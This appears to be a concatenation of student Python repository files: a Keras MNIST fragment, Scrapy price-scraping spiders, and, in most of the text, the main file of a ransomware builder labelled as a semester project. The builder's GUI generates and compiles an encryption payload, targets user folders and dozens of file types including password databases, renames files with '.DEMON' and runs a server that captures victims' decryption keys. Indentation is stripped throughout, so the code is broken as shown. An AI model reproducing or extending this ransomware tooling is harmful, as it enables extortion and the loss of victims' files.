keras.backend.clear_session()
tf.reset_default_graph()
graph=tf.get_default_graph()
with graph.as_default():
print(second)
batch_size=32
classes=10
epochs=5
img_rows, img_cols = 28, 28
(xtr,ytr),(xtst,ytst)=mnist.load_data()
xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1)
xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
ytr=keras.utils.to_categorical(ytr,classes)
ytst=keras.utils.to_categorical(ytst,classes)
model= Sequential()
model.add(Conv2D(32,(3,3),input_shape=input_shape))
model.add(Activation('relu'))
for aa in range(0,conv-1):
model.add(Conv2D(32,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
# model.add(Conv2D(64,(3,3)))
# model.add(Activation('relu'))
# model.add(Conv2D(64,(3,3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2,2)))
# model.add(Dropout(0.25))
model.add(Flatten())
for bb in range(1, dens):
model.add(Dense(512//bb))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(classes))
model.add(Activation('softmax'))
# global numt
# opt=keras.optimizers.Adam(lr=.0001,decay=1e-7)
# optimizers=["adam","nadam","adamax"]
model.compile(loss="categorical_crossentropy",optimizer="adam",metrics=['accuracy'])
# numt+=1
xtr=xtr.astype('float32')
xtst=xtst.astype('float32')
xtr/=255
xtst/=255
stopper=TimeStop(seconds=second)
model.fit(xtr,ytr,batch_size=batch_size,epochs=epochs,validation_data=(xtst,ytst),shuffle=True,callbacks=[stopper])
randomSam=random.randint(0,len(xtst)-1000)
scores=model.evaluate(xtst[randomSam:randomSam+1000],ytst[randomSam:randomSam+1000],verbose=1)
print("Loss:",scores[0] )
print("Accuracy:",scores[1])
#model.save('model.h5')
d = str(Environment.getExternalStorageDirectory())
model.save(d+"/model.h5")
del model
gc.collect()
# keras.backend.clear_session()
# tf.reset_default_graph()
# graph = tf.get_default_graph()
return scores[1]
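# run() decodes an image byte buffer received from the Android side, converts it to a
# 28x28, colour-inverted grayscale MNIST-style input, and returns the digit class
# predicted by the model previously saved to external storage.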
def run(byte):
byter=bytes(byte)
keras.backend.clear_session()
img_rows, img_cols = 28, 28
d = str(Environment.getExternalStorageDirectory())
new_model=tf.keras.models.load_model(d+"/model.h5")
img=cv2.imdecode(np.frombuffer(byter,np.uint8),-1)
img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img = cv2.resize(img_rgb, (img_rows, img_cols), interpolation=cv2.INTER_AREA)
img=cv2.bitwise_not(img)
print("writing image")
cv2.imwrite(d+"/processedImage.jpg", img)
print("saved")
print('here')
print(img.shape)
img=np.asarray(img)
print(img.shape)
img=np.expand_dims(img,axis=0)
img=np.expand_dims(img,axis=3)  # add the trailing channel dimension -> (1, 28, 28, 1)
# classes = 10
# (xtr, ytr), (xtst, ytst) = mnist.load_data()
#
# xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1)
# xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1)
# randomSam = random.randint(0, len(xtst) - 1000)
# ytr = keras.utils.to_categorical(ytr, classes)
# ytst = keras.utils.to_categorical(ytst, classes)
# scores = new_model.evaluate(xtst[randomSam:randomSam + 1000], ytst[randomSam:randomSam + 1000], verbose=1)
# print("Loss:", scores[0])
# print("Accuracy:", scores[1])
# print( new_model.summary())
# run(bytearray)  # stray recursive call; it would re-enter run() with an empty buffer
result=new_model.predict(img,1)
print(result)
return np.argmax(result[0])
def test(byte):
# direct=str(Environment.getExternalStorageDirectory())
# print(os.listdir(direct));
# print (os.listdir("storage/emulated/0/DCIM"))
# # img=cv2.cvtColor(cv2.imread(direct+filename),cv2.COLOR_BGR2GRAY)
# img=cv2.imread(direct+filename)
# print(img.shape)
# return str(image.shape)
print(type(byte))
byte=bytes(byte)
print(type(byte))
img=cv2.imdecode(np.frombuffer(byte,np.uint8),-1)
img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
print(img_rgb.shape)
#main(10, 2,2)
#run("C:\\Users\\adity\\Documents\\mn.png")
# main(10,2,3)
#C:\Users\adity\Downloads\test.jpg
``` |
{
"source": "2020-A-Python-GR1/py-sanango-simbana-edison-ubaldo",
"score": 3
} |
#### File: arania_basica/spiders/arania_ejemplo.py
```python
import scrapy
class IntroSpider(scrapy.Spider):
name = 'introduccion_spider'
urls = [
'http://books.toscrape.com/catalogue/category/books/travel_2/index.html'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'article.product_pod'
)
# titles
titulos = etiqueta_contenedora.css(
'h3 > a::text'
).extract()
print("**************TITULOS******************* {}".format(titulos))
# url
url = etiqueta_contenedora.css(
"div.image_container > a > img.thumbnail::attr(src)"
).extract()
print("**************URL********** {}".format(url))
# stock
stock = etiqueta_contenedora.css(
"div.product_price > p.instock.availability::text"
).extract()
stock_lista = list()
for i in stock:
aux = i.split('\n')
if len(aux) > 2:
stock_lista.append(aux[2])
print("**********STOCK************* {}".format(stock_lista))
# price
dinero = etiqueta_contenedora.css(
"div.product_price > p.price_color::text"
).extract()
dinero_lista = list()
for i in dinero:
dinero_lista.append(float(i.split('£')[1]))
print("*******DINERO*********** {}".format(dinero_lista))
print(type(dinero_lista[0]))
# stars
estrellas = etiqueta_contenedora.css(
"article.product_pod > p::attr(class)"
).extract()
estrellas_lista = list()
for i in estrellas:
estrellas_lista.append(i.split('star-rating ')[1])
print("**************ESTRELLAS*********** {}".format(estrellas_lista))
# To run the spider, use:
# scrapy crawl name   // here `name` is introduccion_spider
```
#### File: fybeca/spiders/arania_fybeca.py
```python
import scrapy
import pandas as pd
class IntroSpider(scrapy.Spider):
name = 'fybeca_spider'
urls = [
'https://www.fybeca.com/FybecaWeb/pages/search-results.jsf?cat=639&s=0&pp=25'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'div.product-tile-inner'
)
# product names
productos = list(etiqueta_contenedora.css(
"a.name::text"
).extract())
# image
url = list(etiqueta_contenedora.css(
"div.detail > a.image > img#gImg.productImage::attr(src)"
).extract())
# original price
precio_original = etiqueta_contenedora.css(
"div.detail > div.side > div.price::attr(data-bind)"
).extract()
# member price
precio_miembro = list(etiqueta_contenedora.css(
"div.detail > div.side > div.price-member > div::attr(data-bind)"
).extract())
# data cleaning
precio_miembro_final = list()
for i in precio_miembro:
precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')",""))
precio_miembro_final.append(precio)
precio_original_final = list()
for i in precio_original:
precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')",""))
precio_original_final.append(precio)
resultado = pd.DataFrame(zip(productos,
url,
precio_original_final,
precio_miembro_final), columns=['Productos','Imagen','Precio normal', 'Precio miembro'])
resultado['Diferencia precios'] = resultado['Precio normal'] - resultado['Precio miembro']
#resultado = resultado.sort_values(by='Diferencia precios',ascending=False)
print(resultado)
# ANSWERS
# which item has the highest and the lowest price -- based on the regular price
mayor_precio = resultado.iloc[resultado['Precio normal'].idxmax()]
print("ITEM CON MAYOR PRECIO NORMAL:")
print(mayor_precio)
menor_precio = resultado.iloc[resultado['Precio normal'].idxmin()]
print("ITEM CON MENOR PRECIO NORMAL:")
print(menor_precio)
# how much we save if everything is bought as a member
ahorrado = resultado.sum()
print("AL COMPRAR COMO AFILIADO SE AHORRA:{}".format(ahorrado['Diferencia precios']))
```
#### File: item_fybeca/item_fybeca/items.py
```python
import scrapy
from scrapy.loader.processors import MapCompose
from scrapy.loader.processors import TakeFirst
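# Rewrites the relative image paths scraped from the site ('../..') into absolute
# URLs under https://www.fybeca.com before they are stored in the item.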
def transformar_url_imagen(texto):
url_fybeca = 'https://www.fybeca.com'
cadena_text = '../..'
return texto.replace(cadena_text,url_fybeca)
class ProductoFybeca(scrapy.Item):
titulo = scrapy.Field()
imagen = scrapy.Field(
input_processor = MapCompose( # list of functions
transformar_url_imagen
),
output_processor = TakeFirst() # the extractor returns a list; TakeFirst keeps only the first element
)
``` |
{
"source": "2020-A-Python-GR1/py-sarzosa-saquinga-carlos-eduardo",
"score": 3
} |
#### File: arania_basica/spiders/arania_ejemplo.py
```python
import scrapy
class IntroSpider(scrapy.Spider):
name = 'introduccion_spider'
urls = [
'http://books.toscrape.com/catalogue/category/books/travel_2/index.html'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'article.product_pod'
)
titulos = etiqueta_contenedora.css(
'h3 > a::text'
).extract()
print(titulos)
```
#### File: RASOMWARE/CODIGO/main.py
```python
import os, sys, subprocess, threading, time, datetime, socket, select, webbrowser, base64, platform, requests, hashlib
from tkinter import *
from tkinter.ttk import *
from ttkthemes import ThemedStyle
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import askdirectory
if platform.system() == 'Linux':
from PIL import Image, ImageTk
else:
import PIL.Image, PIL.ImageTk
from src.create_demon import *
from src.create_decrypt import *
try:
from Crypto import Random
from Crypto.Cipher import AES
from pymsgbox import *
except ImportError as e:
print('ERROR - Failed to import some modules.\n%s' % e)
pass
try:
import pyaes
except ImportError as e:
print('ERROR - Failed to import some modules.\n%s' % e)
def resource_path(relative_path):
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
def dec_key():
key = password(text='Por favor ingrese su clave de descifrado', title='Ingresar Clave', mask ='*')
if key == None or key == '':
messagebox.showwarning('Error', 'Sin Clave. Cancelado...')
return False
return key
def dec_path():
path = askdirectory(title = 'Seleccionar el directorio con archivos para descifrar')
if path == None or path == '':
messagebox.showwarning('Error', 'Ninguna ruta seleccionada, saliendo...')
return False
path = path + '/'
return path
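# AES helpers used by the decryption routines below: ciphertexts are expected to carry
# the random IV as their first AES.block_size bytes (CBC mode), and the plaintext is
# zero-padded to a block boundary, so decrypt() strips the trailing b"\0" bytes.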
def pad(s):
return s + b"\0" * (AES.block_size - len(s) % AES.block_size)
def decrypt(ciphertext, key):
iv = ciphertext[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext[AES.block_size:])
return plaintext.rstrip(b"\0")
def decrypt_file(file_name, key):
with open(file_name, 'rb') as f:
ciphertext = f.read()
dec = decrypt(ciphertext, key)
with open(file_name[:-6], 'wb') as f:
f.write(dec)
def decrypt_file_pyaes(file_name, key):
aes = pyaes.AESModeOfOperationCTR(key)
with open(file_name, 'rb') as fo:
plaintext = fo.read()
dec = aes.decrypt(plaintext)
with open(file_name[:-6], 'wb') as fo:
fo.write(dec)
def rename_file(file_name):
os.rename(file_name, file_name[:-6])
class MainWindow(Tk):
def __init__(self):
Tk.__init__(self)
self.title(string = "Proyecto Bimestral Python") # Set window title
self.resizable(0,0) # Do not allow to be resized
self.ttkStyle = ThemedStyle()
self.ttkStyle.set_theme("ubuntu")
# Top menu
menu = Menu(self)
self.config(background = 'white', menu=menu)
# Input field data is being inserted in this dict
self.options = {
'agreed' : IntVar(),
'host' : StringVar(),
'port' : IntVar(),
'save_keys' : IntVar(),
'remote' : StringVar(),
'local' : StringVar(),
'platform' : StringVar(),
'key' : StringVar(),
'os' : StringVar(),
'full_screen_var' : IntVar(),
'mode' : IntVar(),
'demo' : IntVar(),
'type' : StringVar(),
'method' : StringVar(),
'icon_path' : StringVar(),
'payload_path' : StringVar(),
'decryptor_path' : StringVar(),
'msg' : StringVar(),
'new_msg' : StringVar(),
'img_base64' : StringVar(),
'debug' : IntVar(),
'ext' : StringVar(),
'target_ext' : StringVar(),
'new_target_ext' : StringVar(),
'target_dirs' : StringVar(),
'new_target_dirs' : StringVar(),
'working_dir' : StringVar(),
'new_working_dir' : StringVar(),
'remove_payload' : IntVar(),
'runas' : IntVar(),
'inf_counter' : IntVar(),
}
self.options['agreed'].set(1)
#<activate>
if not self.options['agreed'].get() == 1:
self.show_license()
# Load profile
self.options['inf_counter'].set(0)
# Default Settings
self.options['host'].set('127.0.0.1')
self.options['port'].set(8989)
self.options['save_keys'].set(0)
self.options['full_screen_var'].set(0)
self.options['mode'].set(1)
self.options['demo'].set(0)
self.options['type'].set('pycrypto')
self.options['method'].set('override')
self.options['debug'].set(0)
self.options['ext'].set('.DEMON')
self.options['remove_payload'].set(0)
self.options['runas'].set(0)
self.options['working_dir'].set('$HOME')
self.options['target_dirs'].set('''Downloads
Documents
Pictures
Music
Desktop
Onedrive''')
self.options['target_ext'].set('''txt
ppt
pptx
doc
docx
gif
jpg
png
ico
mp3
ogg
csv
xls
exe
pdf
ods
odt
kdbx
kdb
mp4
flv
iso
zip
tar
tar.gz
rar''')
self.options['msg'].set('''PROYECTO PYTHON SEMESTRE 2020-A''')
self.options['img_base64'].set('''iVBORw0KGgoAAAANSUhEUgAAAlgAAAIOCAMAAABTb4MEAAAAY1BMVEVHcEy/v79/f39QUFBAQEAg
ICAAAAAQEBCfn5/f39/<KEY>''')
self.bind("<Escape>", self.exit_event) # Press ESC to quit app
if platform.system() == 'Linux':
photo = Image.open(resource_path('images/logo2.png'))
resized = photo.resize((150,150), Image.ANTIALIAS)
photo = ImageTk.PhotoImage(resized)
else:
photo = PIL.Image.open(resource_path('images/logo2.png'))
resized = photo.resize((150,150), PIL.Image.ANTIALIAS)
photo = PIL.ImageTk.PhotoImage(resized)
label = Label(self, image=photo, background = 'white')
label.image = photo # keep a reference!
label.grid(row = 0, column = 0, columnspan = 3, rowspan = 4)
Label(self, text = 'Proyecto Python', background = 'white', foreground = 'red', font='Helvetica 32 bold').grid(row = 2, column = 3, columnspan = 3)
# Buttons
generate_demon = Button(self, text = "GENERAR PAYLOAD", command = self.generate, width = 53).grid(row = 4, column = 0, columnspan = 6)
compile = Button(self, text = "COMPILAR PAYLOAD", command = self.compile, width = 53).grid(row = 5, column = 0, columnspan = 6)
start_server = Button(self, text="CAPTURADOR DE CLAVES", command=self.open_server, width=53).grid(row= 6,column=0,columnspan=6)
decrypt = Button(self, text = "DESENCRIPTAR ARCHIVOS", command = self.decrypt_files, width = 53).grid(row = 7, column = 0, columnspan = 6)
exit = Button(self, text = "SALIR", command = self.exit, width = 53).grid(row = 8, column = 0, columnspan = 6)
def exploit_options(self):
self.exp = Toplevel()
self.exp.title(string = 'Exploit Options')
self.exp.configure(background = 'white')
self.exp.resizable(0,0)
self.bind("<Escape>", self.close_exploit) # Press ESC to quit app
Label(self.exp, text = 'Spoof extention', background = 'white').grid(row = 0, column = 0)
def open_server(self):
self.set = Toplevel()
self.set.title(string = 'Settings')
self.set.configure(background = 'white')
self.set.resizable(0,0)
Label(self.set, text = 'Host', background = 'white').grid(row = 1, column = 0, sticky = 'w')
host = Entry(self.set, textvariable = self.options['host'], width = 30)
host.grid(row = 2, column = 0, columnspan = 2)
host.focus()
Label(self.set, text = 'Port', background = 'white').grid(row = 3, column = 0, sticky = 'w')
port = Entry(self.set, textvariable = self.options['port'], width = 30)
port.grid(row = 4, column = 0, columnspan = 2)
#Checkbutton(self.set, text = "Save keys to Onion Portal account", variable = self.options['save_keys'], onvalue = 1, offvalue = 0).grid(row = 5, column = 0, columnspan = 2, sticky = 'w')
if host == None or host == '':
messagebox.showwarning('ERROR', 'Invalid host!')
elif port == None or port == '':
messagebox.showwarning('ERROR', 'Invalid port!')
else:
self.options['host'] == host
self.options['port'] == port
go = Button(self.set, text = 'OK', command = self.run_server, width = 30)
go.grid(row = 7, column = 0, columnspan = 2)
self.set.bind('<Return>', self.set.destroy)
exit = Button(self.set, text = 'CANCELAR', command = self.set.destroy, width = 30).grid(row = 8, column = 0, columnspan = 2)
def run_server(self):
self.set.destroy()
self.serv = Toplevel()
self.serv.title(string = 'Capturador de Claves - Servidor')
self.serv.configure(background = 'white')
self.serv.resizable(0,0)
self.serv.protocol("WM_DELETE_WINDOW", self.close_server_by_click)
self.serv.bind("<Escape>", self.close_server) # Press ESC to close window
# Input field data is being inserted in this dict
self.serv.options = {
'host' : StringVar(),
'port' : IntVar(),
'remote' : StringVar(),
'local' : StringVar(),
'platform' : StringVar(),
'key' : StringVar(),
'mac' : IntVar(),
'linux' : IntVar(),
'other' : IntVar(),
}
# Canvas for image
canvas = Canvas(self.serv, highlightthickness=0, height = 150, width = 500, background = 'white')
canvas.grid(row=0, column=0, columnspan = 4)
#photo = PIL.ImageTk.PhotoImage(PIL.Image.open(BytesIO(base64.b64decode(photo_code))))
if platform.system() == 'Linux':
photo1 = Image.open(resource_path('images/windows.png'))
resized = photo1.resize((100,100), Image.ANTIALIAS)
photo1 = ImageTk.PhotoImage(resized)
else:
photo1 = PIL.Image.open(resource_path('images/windows.png'))
resized = photo1.resize((100,100), PIL.Image.ANTIALIAS)
photo1 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo2 = Image.open(resource_path('images/mac.png'))
resized = photo2.resize((100,100), Image.ANTIALIAS)
photo2 = ImageTk.PhotoImage(resized)
else:
photo2 = PIL.Image.open(resource_path('images/mac.png'))
resized = photo2.resize((100,100), PIL.Image.ANTIALIAS)
photo2 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo3 = Image.open(resource_path('images/linux.png'))
resized = photo3.resize((100,100), Image.ANTIALIAS)
photo3 = ImageTk.PhotoImage(resized)
else:
photo3 = PIL.Image.open(resource_path('images/linux.png'))
resized = photo3.resize((100,100), PIL.Image.ANTIALIAS)
photo3 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo4 = Image.open(resource_path('images/other.png'))
resized = photo4.resize((100,100), Image.ANTIALIAS)
photo4 = ImageTk.PhotoImage(resized)
else:
photo4 = PIL.Image.open(resource_path('images/other.png'))
resized = photo4.resize((100,100), PIL.Image.ANTIALIAS)
photo4 = PIL.ImageTk.PhotoImage(resized)
label = Label(self.serv, image=photo1, background = 'white')
label.image = photo1 # keep a reference!
label.grid(row = 0, column = 0)
label2 = Label(self.serv, image=photo2, background = 'white')
label2.image = photo2 # keep a reference!
label2.grid(row = 0, column = 1)
label3 = Label(self.serv, image=photo3, background = 'white')
label3.image = photo3 # keep a reference!
label3.grid(row = 0, column = 2)
label4 = Label(self.serv, image=photo4, background = 'white')
label4.image = photo4 # keep a reference!
label4.grid(row = 0, column = 3)
self.serv.options['win'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['win'].grid(row = 1, column = 0, columnspan = 1)
self.serv.options['mac'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['mac'].grid(row = 1, column = 1, columnspan = 1)
self.serv.options['linux'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['linux'].grid(row = 1, column = 2, columnspan = 1)
self.serv.options['other'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['other'].grid(row = 1, column = 3, columnspan = 1)
# Log Frame
result = LabelFrame(self.serv, text = 'Log', relief = GROOVE)
result.grid(row = 2, column = 0, rowspan = 4, columnspan = 5)
self.serv.options['log'] = Text(result, foreground="white", background="black", highlightcolor="white", highlightbackground="black", height = 35, width = 120)
self.serv.options['log'].grid(row = 0, column = 1)
scroll = Scrollbar(self.serv, command=self.serv.options['log'].yview)
scroll.grid(row=1, column=5, sticky='nsew')
self.serv.options['log']['yscrollcommand'] = scroll.set
# Tags
self.serv.options['log'].tag_configure('yellow', foreground='yellow')
self.serv.options['log'].tag_configure('red', foreground='red')
self.serv.options['log'].tag_configure('deeppink', foreground='deeppink')
self.serv.options['log'].tag_configure('orange', foreground='orange')
self.serv.options['log'].tag_configure('green', foreground='green')
self.serv.options['log'].tag_configure('bold', font='bold')
self.start_thread()
def export_data(self):
pass
def compile(self):
self.comp = Toplevel()
self.comp.title(string = 'Compilar Payload')
self.comp.configure(background = 'white')
self.comp.resizable(0,0)
self.comp.bind("<Escape>", self.close_compile) # Press ESC to close window
if os.path.isfile('./payload.py'):
self.options['payload_path'].set('./payload.py')
if os.path.isfile('./decryptor.py'):
self.options['decryptor_path'].set('./decryptor.py')
msg = LabelFrame(self.comp, text = 'Message', relief = GROOVE)
msg.grid(row = 0, column = 0, columnspan = 3, sticky = 'w')
Label(msg, text = 'Parece que estas ejecutando %s.\nSolo puede compilar en el sistema operativo que se esta ejecutando.' % platform.system(), background = 'white', font='Helvetica 16').grid(row = 0, column = 0)
os_frame = LabelFrame(self.comp, text = 'OS')
os_frame.grid(row = 1, column = 0)
win = Radiobutton(os_frame, text = 'Windows', variable = self.options['os'], value = 'windows')
win.grid(row = 0, column = 0, sticky = 'w')
mac = Radiobutton(os_frame, text = 'MacOS', variable = self.options['os'], value = 'mac')
mac.grid(row = 1, column = 0, sticky = 'w')
lin = Radiobutton(os_frame, text = 'Linux', variable = self.options['os'], value = 'linux')
lin.grid(row = 2, column = 0, sticky = 'w')
sett_frame = LabelFrame(self.comp, text = 'Opciones')
sett_frame.grid(row = 1, column = 1, columnspan = 2)
Entry(sett_frame, textvariable = self.options['icon_path'], width = 50).grid(row = 0, column = 0)
set_ico = Button(sett_frame, text = "SELECCIONAR ICONO", command = self.select_icon, width = 15).grid(row = 0, column = 1)
Entry(sett_frame, textvariable = self.options['payload_path'], width = 50).grid(row = 1, column = 0)
set_payload = Button(sett_frame, text = "SELECCIONAR PAYLOAD", command = self.select_payload, width = 15).grid(row = 1, column = 1)
Entry(sett_frame, textvariable = self.options['decryptor_path'], width = 50).grid(row = 2, column = 0)
set_decryptor = Button(sett_frame, text = "SELECCIONAR DESCIFRADOR", command = self.select_decryptor, width = 15).grid(row = 2, column = 1)
opt_frame = LabelFrame(self.comp, text = 'Finalizar')
opt_frame.grid(row = 2, column = 0, columnspan = 2)
finish = Button(opt_frame, text = "COMPILAR", command = self.compile_payload, width = 45).grid(row = 0, column = 0)
if platform.system() == 'Windows':
self.options['os'].set('windows')
mac.config(state = DISABLED)
lin.config(state = DISABLED)
elif platform.system() == 'Darwin':
self.options['os'].set('mac')
win.config(state = DISABLED)
lin.config(state = DISABLED)
elif platform.system() == 'Linux':
self.options['os'].set('linux')
win.config(state = DISABLED)
mac.config(state = DISABLED)
def compile_payload(self):
icon = False
try:
payload = open(self.options['payload_path'].get()).read()
except FileNotFoundError:
return messagebox.showerror('ERROR', 'File does not exist, check payload path!')
if not self.options['icon_path'].get() == '':
if not os.path.isfile(self.options['icon_path'].get()):
return messagebox.showwarning('ERROR', 'Icon File Not Found!')
else:
icon = True
if not os.path.isfile(self.options['payload_path'].get()):
return messagebox.showwarning('ERROR', 'Payload Not Found!')
try:
if self.options['os'].get() == 'windows':
py = 'pyinstaller.exe'
else:
py = 'pyinstaller'
if not 'from tkinter.ttk import' in payload:
tk = ''
else:
tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io'
if not 'from Crypto import Random' in payload:
crypto = ''
else:
crypto = '--hidden-import pycryptodome'
if not 'import pyaes' in payload:
pyaes = ''
else:
pyaes = '--hidden-import pyaes'
if icon == True:
os.system('%s -F -w -i %s %s %s %s %s' % (py, self.options['icon_path'].get(), tk, crypto, pyaes, self.options['payload_path'].get()))
else:
os.system('%s -F -w %s %s %s %s' % (py, tk, crypto, pyaes, self.options['payload_path'].get()))
if os.path.isfile('./decryptor.py'):
ask = messagebox.askyesno('Found decryptor!', 'Compilar Desencriptador ahora?')
if ask == False:
messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
self.comp.destroy()
elif ask == True:
self.compile_decrypt()
else:
return messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e)
def compile_decrypt(self):
try:
decrypt = open(self.options['decryptor_path'].get()).read()
except FileNotFoundError:
return messagebox.showerror('ERROR', 'File does not exist, check decryptor path!')
try:
if self.options['os'].get() == 'windows':
py = 'pyinstaller.exe'
else:
py = 'pyinstaller'
if not 'from tkinter.ttk import' in decrypt:
tk = ''
else:
tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io'
if not 'from Crypto import Random' in decrypt:
crypto = ''
else:
crypto = '--hidden-import pycryptodome'
if not 'import pyaes' in decrypt:
pyaes = ''
else:
pyaes = '--hidden-import pyaes'
if not 'from pymsgbox' in decrypt:
pymsg = ''
else:
pymsg = '--hidden-import pymsgbox'
os.system('%s -F -w %s %s %s %s %s' % (py, tk, crypto, pyaes, pymsg, self.options['decryptor_path'].get()))
messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
self.comp.destroy()
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e)
def select_icon(self):
self.options['icon_path'].set(askopenfilename(initialdir = "./", title = 'Select Icon...', filetypes = (('Icon Files', '*.ico'), ('All Files', '*.*'))))
def select_payload(self):
self.options['payload_path'].set(askopenfilename(initialdir = "./", title = 'Select Payload...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*'))))
def select_decryptor(self):
self.options['decryptor_path'].set(askopenfilename(initialdir = "./", title = 'Select Decryptor...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*'))))
def generate(self):
self.gen = Toplevel()
self.gen.title(string = 'Generar Payload')
self.gen.configure(background = 'white')
self.gen.resizable(0,0)
self.gen.bind("<Escape>", self.close_generate) # Press ESC to close window
mode_frame = LabelFrame(self.gen, text = 'Modo')
mode_frame.grid(row = 0, column = 0, sticky = 'nw')
Radiobutton(mode_frame, text = 'GUI', variable = self.options['mode'], value = 1).grid(row = 0, column = 0, sticky = 'w')
Radiobutton(mode_frame, text = 'Consola', variable = self.options['mode'], value = 2, command = self.check_settings).grid(row = 1, column = 0, sticky = 'w')
Checkbutton(mode_frame, text = "Fullscreen", variable = self.options['full_screen_var'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 1, sticky = 'w')
server_frame = LabelFrame(self.gen, text = 'Servidor Remoto')
server_frame.grid(row = 0, column = 1, sticky = 'nw')
Label(server_frame, text = 'Host:').grid(row = 0, column = 0, sticky = 'w')
Entry(server_frame, textvariable = self.options['host'], width = 20).grid(row = 0, column = 1)
Label(server_frame, text = 'Port:').grid(row = 1, column = 0, sticky = 'w')
Entry(server_frame, textvariable = self.options['port'], width = 20).grid(row = 1, column = 1)
enc_frame = LabelFrame(self.gen, text = 'Tipo de Encriptación')
enc_frame.grid(row = 0, column = 2, sticky = 'w')
Radiobutton(enc_frame, text = 'PyCrypto (Fast)', variable = self.options['type'], value = 'pycrypto').grid(row = 0, column = 0, sticky = 'w')
Radiobutton(enc_frame, text = 'PyAES (Slow)', variable = self.options['type'], value = 'pyaes').grid(row = 1, column = 0, sticky = 'w')
content_frame = LabelFrame(self.gen, text = 'Contenido')
content_frame.grid(row = 1, column = 0, sticky = 'nw')
set_dirs = Button(content_frame, text = 'Directorios', command = self.set_dirs, width = 25).grid(row = 0, column = 0)
set_msg = Button(content_frame, text = 'Mensaje', command = self.set_msg, width = 25).grid(row = 1, column = 0)
set_img = Button(content_frame, text = 'Imagen', command = self.set_img, width = 25).grid(row = 2, column = 0)
set_ext = Button(content_frame, text = 'Extensiones', command = self.set_ext, width = 25).grid(row = 3, column = 0)
options_frame = LabelFrame(self.gen, text = 'Opciones')
options_frame.grid(row = 0, column = 3, sticky = 'nw')
Checkbutton(options_frame, text = 'Demo', variable = self.options['demo'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 0, sticky = 'w')
Checkbutton(options_frame, text = 'Debug', variable = self.options['debug'], onvalue = 1, offvalue = 0).grid(row = 1, column = 0, sticky = 'w')
Checkbutton(options_frame, text = 'Admin', variable = self.options['runas'], onvalue = 1, offvalue = 0).grid(row = 2, column = 0, sticky = 'w')
meth_frame = LabelFrame(self.gen, text = 'Método de Encriptación')
meth_frame.grid(row = 1, column = 1, sticky = 'w')
Radiobutton(meth_frame, text = 'Sobrescribir y Renombrar', variable = self.options['method'], value = 'override').grid(row = 0, column = 0, sticky = 'w')
Radiobutton(meth_frame, text = 'Copiar y Eliminar', variable = self.options['method'], value = 'copy').grid(row = 1, column = 0, sticky = 'w')
finish_frame = LabelFrame(self.gen, text = 'Finalizar')
finish_frame.grid(row = 1, column = 2, columnspan = 1, sticky = 'w')
generate = Button(finish_frame, text = "Generar", command = self.make_demon, width = 25).grid(row = 0, column = 0)
def set_img(self):
try:
f = base64.b64encode(open(askopenfilename(initialdir = "./", title = 'Select Image...', filetypes = ([('Image Files', '*.png *.jpg')])), 'rb').read()).decode('utf-8')
except FileNotFoundError:
return
self.options['img_base64'].set(f)
def set_msg(self):
self.message = Toplevel()
self.message.title(string = 'Set Custom Message')
self.message.configure(background = 'white')
self.message.resizable(0,0)
self.message.bind("<Escape>", self.close_set_msg)
self.options['new_msg'] = Text(self.message, height = 25, width = 100)
self.options['new_msg'].grid(row = 0, column = 0)
save = Button(self.message, text = 'SAVE', command = self.change_msg, width = 50).grid(row = 1, column = 0)
self.options['new_msg'].insert(END, self.options['msg'].get())
self.options['new_msg'].focus()
def change_msg(self):
self.options['msg'].set(self.options['new_msg'].get('1.0', END))
self.message.destroy()
def set_ext(self):
self.extentions = Toplevel()
self.extentions.title(string = 'Set File Extentions')
self.extentions.configure(background = 'white')
self.extentions.resizable(0,0)
self.extentions.bind("<Escape>", self.close_set_target_ext)
self.options['new_target_ext'] = Text(self.extentions, height = 15, width = 25)
self.options['new_target_ext'].grid(row = 0, column = 0)
scrollb = Scrollbar(self.extentions, command=self.options['new_target_ext'].yview)
scrollb.grid(row=0, column=1, sticky='nsew')
